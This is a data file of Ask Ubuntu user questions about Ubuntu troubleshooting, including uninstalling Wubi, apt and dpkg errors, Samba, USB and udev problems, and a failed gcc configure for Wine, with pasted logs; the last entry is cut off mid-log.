521531	help uninstalling ubuntu from windows 7 , both on same drive	i have seen a couple guides that spoke about uninstalling ubuntu and have tried following the guides provided in askubuntu . i have installed ubuntu 14.04.1 lts from an usb drive and have chosen to install it on same drive/partition . i then have tried to remove ubuntu first under the windows uninstall programs screen . the ubuntu logo was on there , however when i clicked on it to install it errored out and states that this program is not available . after that the icon disappeared . after that i did a search on the c drive for ubuntu items and folders and saw the wubi uninstalled . i ran that program , and if finished successfully . however , when i restarted my laptop the ubuntu start-up menu still appeared and asked if i wanted to run either ubuntu or windows partition like earlier . is it possible to completely remove ubuntu from windows 7 using an ubuntu usb stick ( same process that i used to install ubuntu side by side with windows 7 ) and if i can would that affect windows 7 . also i have seen os-uninstaller mentioned in some of the other guides . would that be risky if you are trying to remove ubuntu os while also logged into ubuntu os ? thank you for your help .
521535	package error in 12.04 ubuntu	when using sudo apt-get install libxerces27 libxerces27-dev libopenal0a libglut / libglut3-dev libfontcongfig1 it says for every package e : unable to locate package . i am using precise distribution of linux 12.04 please help .
521536	torrents do n't download in kubuntu	i have a problem with torrents i 've been using linux ( kubuntu ) for about two months ... and i also liked the torrent client that came with it i.e ( ktorrent ) but recently i noticed that ktorrent dose n't download again even if the torrent has over a thousand seeders , so i ended up switching to qbitorrent but it dose n't download also , my internet speed is 100mbps so i guess that ok , i 've tried uninstalling and installing again but it dose n't help ... please has anyone experienced this issue because i need help in solving this.also is there any log file that i should check for help in solving this
521537	how to install ubuntu 14.04 on a dynamic disk ?	guy actually i am trying to install ubuntu 14.04 using a usb but while installation the option along side windows is missing . i heard that if we have a dynamic disk , ubuntu will not give the option along side windows . so please help me out in installing ubuntu 14.04 on my system . my system configuration : os : windows 7 , intel i3 processor , 4 gb ram , 1tb hard disk . thanks in advance : )
521543	why does ubuntu not protect itself against memory shortage	if you create a very simple script , simply pointing at itself ie : /home/user/loop.sh and then executes the script in terminal ( as regular user ) , it starts to consume more and more memory , until the user sessions crashes . all memory used for the session is lost and lightdm is restarted . why does ubuntu not protect itself against application that try to take up more memory than the system can offer ? ( 14.04 64 bit )
521549	wireless conection disconnected every 5 min	hello i am using ubuntu 14.04.i am new to ubuntu . i am using desktop.in desktop i am using a wifi dongle.but every 5 min my wifi is disconected.but it is working fine in windows 7.i am using netgear nn150 wireless router .
521550	i am getting this problem with sudo apt-get update	do n't know how to solve it i 've tried many ways . debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing package man-db ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up cups ( 1.7.2-0ubuntu1.2 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing package cups ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up cups-bsd ( 1.7.2-0ubuntu1.2 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing package cups-bsd ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : man-db cups cups-bsd e : sub-process /usr/bin/dpkg returned an error code ( 1 )
521554	grafana not picking up my metrics from graphite	i installed graphite and grafana which i can both access through web . i was sending some test metrics to the machine using a ssc serv utility , which is basically a windows tool where you enter you graphite url / ip and it starts sending common metrics from performance monitor . cpu / memory etc . in my graphite i see all the incoming metrics already but grafana stays empty . i assume my database settings are not correct , here are my grafana settings : // graphite & elasticsearch example setup datasources : { graphite : { type : 'graphite ' , url : `` localhost:80 '' , } , elasticsearch : { type : 'elasticsearch ' , url : `` http : //my.elastic.server.com:9200 '' , index : 'grafana-dash ' , grafanadb : true , } } , localhost:80 is the url for my graphite website and i have grafana running on port 81 . what could i be missing ? thx in advance , every help is upvoted .
521558	smbtree produces no output	ubuntu 14.04 installed . also installed samba , system-config-samba , samba-common-bin , samba-common , smbclient , nautilus-share , fusemb , winbind , and cifs-utils , among others . i 'm trying to get samba to work . right now i have machines running either ubuntu 14.04 or lubuntu 14.04 , but will soon be adding a windows box to the mix . i call my workgroup , `` workgroup '' . after installing all the packages listed above , i thought the first thing i should do is make sure all is in order . so , i ran testparm : main1 @ system1 : ~ $ testparm load smb config files from /etc/samba/smb.conf rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) processing section `` [ printers ] '' processing section `` [ print $ ] '' processing section `` [ shared_stuff ] '' loaded services file ok. server role : role_standalone press enter to see a dump of your service definitions [ global ] server string = % h server ( samba , ubuntu ) server role = standalone server map to guest = bad user obey pam restrictions = yes guest account = main1 pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . username map = /etc/samba/smbusers unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 name resolve order = bcast , host dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d idmap config * : backend = tdb guest ok = yes [ printers ] comment = all printers path = /var/spool/samba create mask = 0700 printable = yes print ok = yes browseable = no [ print $ ] comment = printer drivers path = /var/lib/samba/printers [ shared_stuff ] path = /home/main1/shared_stuff read only = no i then ran smbtree , expecting to see the shared shared_stuff in the output , but instead got nothing for the output : main1 @ system1 : ~ $ smbtree enter main1 's password : main1 @ system1 : ~ $ i have looked all over the internet for any posting by an earthling regarding no output for smbtree , but i can not figure out what is wrong . any help will be greatly appreciated . i also ran smbtree -d3 : main1 @ system1 : ~ $ smbtree -d3 lp_load_ex : refreshing parameters initialising global parameters rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) params.c : pm_process ( ) - processing configuration file `` /etc/samba/smb.conf '' processing section `` [ global ] '' added interface eth0 ip=192.168.1.2 bcast=192.168.1.255 netmask=255.255.255.0 enter main1 's password : tdb ( /var/cache/samba/gencache.tdb ) : tdb_open_ex : could not open file /var/cache/samba/gencache.tdb : permission denied name_resolve_bcast : attempting broadcast lookup for name workgroup < 0x1d > samba_tevent : epoll_ctl_del ebadf for fde [ 0x7f06594e7800 ] mpx_fde [ ( nil ) ] fd [ 7 ] - disabling name_resolve_bcast : attempting broadcast lookup for name workgroup < 0x1b > samba_tevent : epoll_ctl_del ebadf for fde [ 0x7f06594e7770 ] mpx_fde [ ( nil ) ] fd [ 7 ] - disabling name_resolve_bcast : attempting broadcast lookup for name __msbrowse__ < 0x1 > samba_tevent : epoll_ctl_del ebadf for fde [ 0x7f06594e7800 ] mpx_fde [ ( nil ) ] fd [ 7 ] - disabling and , i do not have ufw running : main1 @ system1 : ~ $ sudo ufw status [ sudo ] password for main1 : status : inactive
521559	usb sticks not accessible & system hangs at shut-down : related to udev ?	i installed lubuntu 14.04.1 on an older acer travelmate 4500 using the forcepae option and adjusting upowerd.py according to http : //askubuntu.com/a/515909/288322 . after running the update manager until the system is said to be up-to-date , i have two problems : i can not access usb memory sticks and the laptop hangs during shut-down . the problem might somehow be connected to the update packages `` common library libudev '' and `` /dev/ and hotplug background process '' : i selected one update at a time ; when selecting `` common library libudev '' as the second last ( i wanted to select `` /dev/ and hotplug background process '' as the last one ) , the update hung at that moment the status bar showed setting up udev ( 204-5ubuntu20.5 ) . some lines before that , it said adding diversion of /bin/udevadm to /bin/udevadm.upgrade by fake-udev ' ; that might also be of interest . other than that it was the usual preparing to unpack , unpacking , processing and setting up `` libudev1 : i386 ( 204-5ubuntu20.5 ) '' . i had to kill the update manager and to re-start the laptop . now , i.e . after re-boot , i can access usb memory sticks and the system shut-down work excellent ( showing all processes ended within 1 seconds ... , a message about networkmanager [ 471 ] , deactivating swap and will now halt and then , shutting off . so far so good , but the wireless was not working ; there was no eth1 listed in iwconfig . i re-booted but it continued as described ( usb perfect , shut-down perfect , no wireless ) . at that stage , i posted a description in the question http : //askubuntu.com/q/521402/288322 ( perhaps that description could help , even though i closed that question . ) then , i opened the update manager again and it automatically run some tasks and showing the message that the system is now up-to-date . there were no more updates available , i.e . the `` /dev/ and hotplug background process '' which i did not yet choose to install must have been installed automatically . usb and shut-down worked , wireless not . then , after re-starting , this changed : now , i ... ... can not access any usb memory sticks ; ... the system hangs at shut-down showing killing all remaining processes ... [ fail ] , a message on networkmanager and will now halt but never shutting down ; ... wireless eth1 works fine . regarding hang-up during shut-down , i described a slightly earlier stage ( still valid , but details might have changed marginally ) in a question on lubuntu : neither shut-down nor restart works . regarding usb sticks , i read usb recognized but not available ? . here , similar information : luke @ humboldt : ~ $ uname -a linux humboldt 3.13.0-35-generic # 62-ubuntu smp fri aug 15 01:58:01 utc 2014 i686 i686 i686 gnu/linux before entering any usb devices : luke @ humboldt : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub after entering two usb devices ( one memory stick and one external hard disk which both work fine on another computer ) : luke @ humboldt : ~ $ lsusb bus 001 device 005 : id 8644:800b bus 001 device 006 : id 1058:0910 western digital technologies , inc. mybook essential external hdd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub however , none of the usb devices is accessible in pcmanfm and also not listed under /media/luke . with both usb devices still connected fdisk shows : luke @ humboldt : ~ $ sudo fdisk -l disk /dev/sda : 80.0 gb , 80026361856 bytes 255 köpfe , 63 sektoren/spur , 9729 zylinder , zusammen 156301488 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes festplattenidentifikation : 0x000e9d19 gerät boot . anfang ende blöcke id system /dev/sda1 * 2048 19533297 9765625 83 linux /dev/sda2 19533822 156301311 68383745 5 erweiterte /dev/sda5 153718784 156301311 1291264 82 linux swap / solaris /dev/sda6 19533824 153718783 67092480 83 linux partitionstabelleneinträge sind nicht in platten-reihenfolge and lsblk shows the same with the usb devices connected : name maj : min rm size ro type mountpoint sda 8:0 0 74,5g 0 disk ├─sda1 8:1 0 9,3g 0 part / ├─sda2 8:2 0 1k 0 part ├─sda5 8:5 0 1,2g 0 part [ swap ] └─sda6 8:6 0 64g 0 part sr0 11:0 1 1024m 0 rom gparted does also only show the same four partitions . and also disk utility does not show the usb memories . dmesg shows : [ 1076.648283 ] usb 1-4 : new high-speed usb device number 5 using ehci-pci [ 1076.780965 ] usb 1-4 : new usb device found , idvendor=8644 , idproduct=800b [ 1076.780978 ] usb 1-4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1076.780987 ] usb 1-4 : product : usb flash disk [ 1076.780996 ] usb 1-4 : manufacturer : general [ 1076.781005 ] usb 1-4 : serialnumber : 00000000000010d7 [ 1080.492276 ] usb 1-3 : new high-speed usb device number 6 using ehci-pci [ 1080.625435 ] usb 1-3 : new usb device found , idvendor=1058 , idproduct=0910 [ 1080.625447 ] usb 1-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1080.625457 ] usb 1-3 : product : external hdd [ 1080.625465 ] usb 1-3 : manufacturer : western digital [ 1080.625474 ] usb 1-3 : serialnumber : 5743414e5933333530363735 i re-booted the laptop several times ; the problem persists . when using a lubuntu 14.04.1 live-cd , all devices are directly accessible . could this problem be related to udev ? because between restarting after the failed first update and before re-running the update manager once more , i could access usb devices as well as shut-down the system properly . but , wifi/eth1 was missing . i put the whole syslog on https : //www.dropbox.com/sh/b1ghdxsq1x1v7wv/aad05pcvziy33spbcsxok0qka ? dl=0 in case that might help . i also added kern.log , apt/history.log , apt/term.log , installer/syslog , installer/debug and the output of lspci -nn and demidecode . there was also a comment that the kernel might not mapp correctly to sd* , see usb recognized but not available ? . thanks for some hints in advance !
521562	why is my screen misplaced ? 5 inches of my tv screen ( rgb out )	my question is : why is my screen misplaced 5 inches to the left of my screen ? im using rgb out on an old computer runing 14. something . when it boots up and shows the imb logo the screen fits my tv perfectly , but when i reaches the login page i does some messed up shit and shifts 5 inches to the left . i can still use the launcher but i ca n't see it . i dont have the original moniter connected , but when i choose to mirror the screens ( 640x480 ) the screen fits but it 's a shitty resolution please help .
521569	gcc doesnâ´t work	i have a problem with gcc i try to compile wine 1.7.26 . when i use the ./configure command i get an error : c compiler can not create executables see `config.log ' for more details this file contains any messages produced by compilers while running configure , to aid debugging if configure makes a mistake . it was created by wine configure 1.7.26 , which was generated by gnu autoconf 2.69 . invocation command line was $ ./configure # # -- -- -- -- - # # # # platform . # # # # -- -- -- -- - # # hostname = david-1001px uname -m = i686 uname -r = 3.16.0-12-generic uname -s = linux uname -v = # 18-ubuntu smp mon sep 1 13:04:08 utc 2014 /usr/bin/uname -p = unknown /bin/uname -x = unknown /bin/arch = unknown /usr/bin/arch -k = unknown /usr/convex/getsysinfo = unknown /usr/bin/hostinfo = unknown /bin/machine = unknown /usr/bin/oslevel = unknown /bin/universe = unknown path : /usr/local/sbin path : /usr/local/bin path : /usr/sbin path : /usr/bin path : /sbin path : /bin # # -- -- -- -- -- - # # # # core tests . # # # # -- -- -- -- -- - # # configure:3461 : checking build system type configure:3475 : result : i686-pc-linux-gnu configure:3495 : checking host system type configure:3508 : result : i686-pc-linux-gnu configure:3538 : checking whether make sets $ ( make ) configure:3560 : result : yes configure:3617 : checking for gcc configure:3633 : found /usr/bin/gcc configure:3644 : result : gcc configure:3873 : checking for c compiler version configure:3882 : gcc -- version > & 5 gcc ( ubuntu 4.9.1-12ubuntu2 ) 4.9.1 copyright ( c ) 2014 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . configure:3893 : $ ? = 0 configure:3882 : gcc -v > & 5 using built-in specs . collect_gcc=gcc collect_lto_wrapper=/usr/lib/gcc/i686-linux-gnu/4.9/lto-wrapper target : i686-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu 4.9.1-12ubuntu2 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.9/readme.bugs -- enable-languages=c , c++ , java , go , d , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.9 -- enable-shared -- enable-linker-build-id -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.9 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-gnu-unique-object -- disable-vtable-verify -- enable-plugin -- with-system-zlib -- disable-browser-plugin -- enable-java-awt=gtk -- enable-gtk-cairo -- with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-i386/jre -- enable-java-home -- with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-i386 -- with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-i386 -- with-arch-directory=i386 -- with-ecj-jar=/usr/share/java/eclipse-ecj.jar -- enable-objc-gc -- enable-targets=all -- enable-multiarch -- disable-werror -- with-arch-32=i686 -- with-multilib-list=m32 , m64 , mx32 -- enable-multilib -- with-tune=generic -- enable-checking=release -- build=i686-linux-gnu -- host=i686-linux-gnu -- target=i686-linux-gnu thread model : posix gcc version 4.9.1 ( ubuntu 4.9.1-12ubuntu2 ) configure:3893 : $ ? = 0 configure:3882 : gcc -v > & 5 gcc : error : unrecognized command line option '-v' gcc : fatal error : no input files compilation terminated . configure:3893 : $ ? = 4 configure:3882 : gcc -qversion > & 5 gcc : error : unrecognized command line option '-qversion' gcc : fatal error : no input files compilation terminated . configure:3893 : $ ? = 4 configure:3913 : checking whether the c compiler works configure:3935 : gcc conftest.c > & 5 /usr/bin/ld : this linker was not configured to use sysroots collect2 : error : ld returned 1 exit status configure:3939 : $ ? = 1 configure:3977 : result : no configure : failed program was : | /* confdefs.h */ | # define package_name `` wine '' | # define package_tarname `` wine '' | # define package_version `` 1.7.26 '' | # define package_string `` wine 1.7.26 '' | # define package_bugreport `` wine-devel @ winehq.org '' | # define package_url `` http : //www.winehq.org '' | /* end confdefs.h . */ | | int | main ( ) | { | | ; | return 0 ; | } configure:3982 : error : in `/home/david/src/wine-1.7.26 ' : configure:3984 : error : c compiler can not create executables see `config.log ' for more details # # -- -- -- -- -- -- -- -- # # # # cache variables . # # # # -- -- -- -- -- -- -- -- # # ac_cv_build=i686-pc-linux-gnu ac_cv_env_capi20_cflags_set= ac_cv_env_capi20_cflags_value= ac_cv_env_capi20_libs_set= ac_cv_env_capi20_libs_value= ac_cv_env_ccc_set= ac_cv_env_ccc_value= ac_cv_env_cc_set= ac_cv_env_cc_value= ac_cv_env_cflags_set= ac_cv_env_cflags_value= ac_cv_env_cppflags_set= ac_cv_env_cppflags_value= ac_cv_env_cpp_set= ac_cv_env_cpp_value= ac_cv_env_cxxflags_set= ac_cv_env_cxxflags_value= ac_cv_env_cxx_set= ac_cv_env_cxx_value= ac_cv_env_dbus_cflags_set= ac_cv_env_dbus_cflags_value= ac_cv_env_dbus_libs_set= ac_cv_env_dbus_libs_value= ac_cv_env_fontconfig_cflags_set= ac_cv_env_fontconfig_cflags_value= ac_cv_env_fontconfig_libs_set= ac_cv_env_fontconfig_libs_value= ac_cv_env_freetype_cflags_set= ac_cv_env_freetype_cflags_value= ac_cv_env_freetype_libs_set= ac_cv_env_freetype_libs_value= ac_cv_env_gnutls_cflags_set= ac_cv_env_gnutls_cflags_value= ac_cv_env_gnutls_libs_set= ac_cv_env_gnutls_libs_value= ac_cv_env_gphoto2_cflags_set= ac_cv_env_gphoto2_cflags_value= ac_cv_env_gphoto2_libs_set= ac_cv_env_gphoto2_libs_value= ac_cv_env_gphoto2_port_cflags_set= ac_cv_env_gphoto2_port_cflags_value= ac_cv_env_gphoto2_port_libs_set= ac_cv_env_gphoto2_port_libs_value= ac_cv_env_gstreamer_cflags_set= ac_cv_env_gstreamer_cflags_value= ac_cv_env_gstreamer_libs_set= ac_cv_env_gstreamer_libs_value= ac_cv_env_hal_cflags_set= ac_cv_env_hal_cflags_value= ac_cv_env_hal_libs_set= ac_cv_env_hal_libs_value= ac_cv_env_jpeg_cflags_set= ac_cv_env_jpeg_cflags_value= ac_cv_env_jpeg_libs_set= ac_cv_env_jpeg_libs_value= ac_cv_env_lcms2_cflags_set= ac_cv_env_lcms2_cflags_value= ac_cv_env_lcms2_libs_set= ac_cv_env_lcms2_libs_value= ac_cv_env_ldflags_set= ac_cv_env_ldflags_value= ac_cv_env_libs_set= ac_cv_env_libs_value= ac_cv_env_mpg123_cflags_set= ac_cv_env_mpg123_cflags_value= ac_cv_env_mpg123_libs_set= ac_cv_env_mpg123_libs_value= ac_cv_env_png_cflags_set= ac_cv_env_png_cflags_value= ac_cv_env_png_libs_set= ac_cv_env_png_libs_value= ac_cv_env_sane_cflags_set= ac_cv_env_sane_cflags_value= ac_cv_env_sane_libs_set= ac_cv_env_sane_libs_value= ac_cv_env_tiff_cflags_set= ac_cv_env_tiff_cflags_value= ac_cv_env_tiff_libs_set= ac_cv_env_tiff_libs_value= ac_cv_env_xmkmf_set= ac_cv_env_xmkmf_value= ac_cv_env_xml2_cflags_set= ac_cv_env_xml2_cflags_value= ac_cv_env_xml2_libs_set= ac_cv_env_xml2_libs_value= ac_cv_env_xslt_cflags_set= ac_cv_env_xslt_cflags_value= ac_cv_env_xslt_libs_set= ac_cv_env_xslt_libs_value= ac_cv_env_build_alias_set= ac_cv_env_build_alias_value= ac_cv_env_host_alias_set= ac_cv_env_host_alias_value= ac_cv_env_target_alias_set= ac_cv_env_target_alias_value= ac_cv_host=i686-pc-linux-gnu ac_cv_prog_ac_ct_cc=gcc ac_cv_prog_make_make_set=yes # # -- -- -- -- -- -- -- -- - # # # # output variables . # # # # -- -- -- -- -- -- -- -- - # # all_test_resources= '' all_vars_rules= '' alsa_libs= '' appkit_libs= '' applicationservices_libs= '' ar= '' arflags= '' bison= '' builtinflag= '' capi20_cflags= '' capi20_libs= '' carbon_libs= '' cc='gcc' cflags= '' convert= '' coreaudio_libs= '' corefoundation_libs= '' coreservices_libs= '' cpp= '' cppbin= '' cppflags= '' crosscc= '' crosstarget= '' cups_cflags= '' cxx= '' cxxflags= '' dbus_cflags= '' dbus_libs= '' defs= '' diskarbitration_libs= '' dllflags= '' dllprefix= '' dlltool= '' dl_libs= '' echo_c= '' echo_n='-n' echo_t= '' egrep= '' exeext= '' extracflags= '' flex= '' fontconfig_cflags= '' fontconfig_libs= '' fontforge= '' forcefeedback_libs= '' freetype_cflags= '' freetype_libs= '' gettextpo_libs= '' gnutls_cflags= '' gnutls_libs= '' gphoto2_cflags= '' gphoto2_libs= '' gphoto2_port_cflags= '' gphoto2_port_libs= '' grep= '' gstreamer_cflags= '' gstreamer_libs= '' hal_cflags= '' hal_libs= '' icotool= '' iokit_libs= '' jpeg_cflags= '' jpeg_libs= '' kstat_libs= '' lcms2_cflags= '' lcms2_libs= '' ldap_libs= '' ldconfig= '' ldd= '' ldflags= '' ldrpath_install= '' ldrpath_local= '' libobjs= '' libpcap= '' libs= '' libwine_rules= '' linguas= '' ln_s= '' loader_rules= '' ltlibobjs= '' mpg123_cflags= '' mpg123_libs= '' msgfmt= '' objext= '' openal_libs= '' opencl_libs= '' opengl_libs= '' oss4_cflags= '' package_bugreport='wine-devel @ winehq.org' package_name='wine' package_string='wine 1.7.26' package_tarname='wine' package_url='http : //www.winehq.org' package_version='1.7.26' path_separator= ' : ' pkg_config= '' png_cflags= '' png_libs= '' poll_libs= '' prelink= '' procstat_libs= '' pthread_libs= '' quicktime_libs= '' ranlib= '' readelf= '' resolv_libs= '' rsvg= '' rt_libs= '' sane_cflags= '' sane_libs= '' security_libs= '' set_make= '' shell='/bin/bash' socket_libs= '' strip= '' targetflags= '' tiff_cflags= '' tiff_libs= '' toolsdir= '' toolsext= '' unwindflags= '' xmkmf= '' xml2_cflags= '' xml2_libs= '' xslt_cflags= '' xslt_libs= '' x_cflags= '' x_extra_libs= '' x_libs= '' x_pre_libs= '' z_libs= '' ac_ct_ar= '' ac_ct_cc='gcc' ac_ct_cxx= '' bindir= ' $ { exec_prefix } /bin' build='i686-pc-linux-gnu' build_alias= '' build_cpu='i686' build_os='linux-gnu' build_vendor='pc' datadir= ' $ { datarootdir } ' datarootdir= ' $ { prefix } /share' dlldir= '' docdir= ' $ { datarootdir } /doc/ $ { package_tarname } ' dvidir= ' $ { docdir } ' exec_prefix='none' host='i686-pc-linux-gnu' host_alias= '' host_cpu='i686' host_os='linux-gnu' host_vendor='pc' htmldir= ' $ { docdir } ' includedir= ' $ { prefix } /include' infodir= ' $ { datarootdir } /info' libdir= ' $ { exec_prefix } /lib' libexecdir= ' $ { exec_prefix } /libexec' localedir= ' $ { datarootdir } /locale' localstatedir= ' $ { prefix } /var' mandir= ' $ { datarootdir } /man' oldincludedir='/usr/include' pdfdir= ' $ { docdir } ' prefix='none' program_transform_name= 's , x , x , ' psdir= ' $ { docdir } ' sbindir= ' $ { exec_prefix } /sbin' sharedstatedir= ' $ { prefix } /com' sysconfdir= ' $ { prefix } /etc' target_alias= '' # # -- -- -- -- -- - # # # # confdefs.h . # # # # -- -- -- -- -- - # # /* confdefs.h */ # define package_name `` wine '' # define package_tarname `` wine '' # define package_version `` 1.7.26 '' # define package_string `` wine 1.7.26 '' # define package_bugreport `` wine-devel @ winehq.org '' # define package_url `` http : //www.winehq.org '' configure : exit 77 anyone know what to do to solve this ?
521570	problems with upgrade to ubuntu 14	since upgrading to ubuntu 14 a couple of weeks ago i 've been unable to install or update any software using apt or the regular updates . when using apt-get i always get the error message e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help would be greatly appreciated ( there are other issues since updating , but it seems impossible to fix them without fixing this problem first ) dan kennefick my most recent attempt to run sudo apt-get -f install returned the following : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libgnomecanvas2-0 libgnomecanvas2-common libquvi-scripts libquvi7 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 29 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up tex-common ( 4.04 ) ... ignoring /etc/texmf/texmf.d/05texmf.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/15plain.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/45texinputs.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/55fonts.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/65bibtex.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/75dvips.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/80dvipdfmx.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/85misc.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/90texdoc.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/95nonpath.cnf during generation of texmf.cnf , please remove manually ! running mktexlsr . this may take some time ... done . running updmap-sys . this may take some time ... updmap-sys failed . output has been stored in /tmp/updmap.pntfjpz1 please include this file if you report a bug . sometimes , not accepting conffile updates in /etc/texmf/updmap.d causes updmap-sys to fail . please check for files with extension .dpkg-dist or .ucf-dist in this directory dpkg : error processing package tex-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of lmodern : lmodern depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package lmodern ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of tex-gyre : tex-gyre depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package tex-gyre ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of texlive-latex-base : texlive-latex-base depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-base ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-recommended : texlive-latex-recommended depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-latex-recommended depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-recommended ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of latex-xcolor : no apport report written because maxreports is reached already latex-xcolor depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . latex-xcolor depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-xcolor ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-beamer : latex-beamer depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . latex-beamer depends on latex-xcolor ( > = 2.00-1 ) ; however : package latex-xcolor is not configured yet . latex-beamer depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing package latex-beamer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of maxima-test : maxima-test depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package maxima-test ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-extra-utils : texlive-extra-utils depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-extra-utils depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-extra-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-font-utils : texlive-font-utils depends on tex-common ( > = 3 ) ; however : no apport report written because maxreports is reached already package tex-common is not configured yet . dpkg : error processing package texlive-font-utils ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-extra : texlive-fonts-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-extra ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-fonts-extra-doc : texlive-fonts-extra-doc depends on tex-common ( > = 3 ) ; however : no apport report written because maxreports is reached already package tex-common is not configured yet . dpkg : error processing package texlive-fonts-extra-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-recommended : texlive-fonts-recommended depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-recommended ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-fonts-recommended-doc : texlive-fonts-recommended-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . no apport report written because maxreports is reached already dpkg : error processing package texlive-fonts-recommended-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-generic-recommended : texlive-generic-recommended depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-generic-recommended ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-base-doc : texlive-latex-base-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-base-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-pictures : texlive-pictures depends on 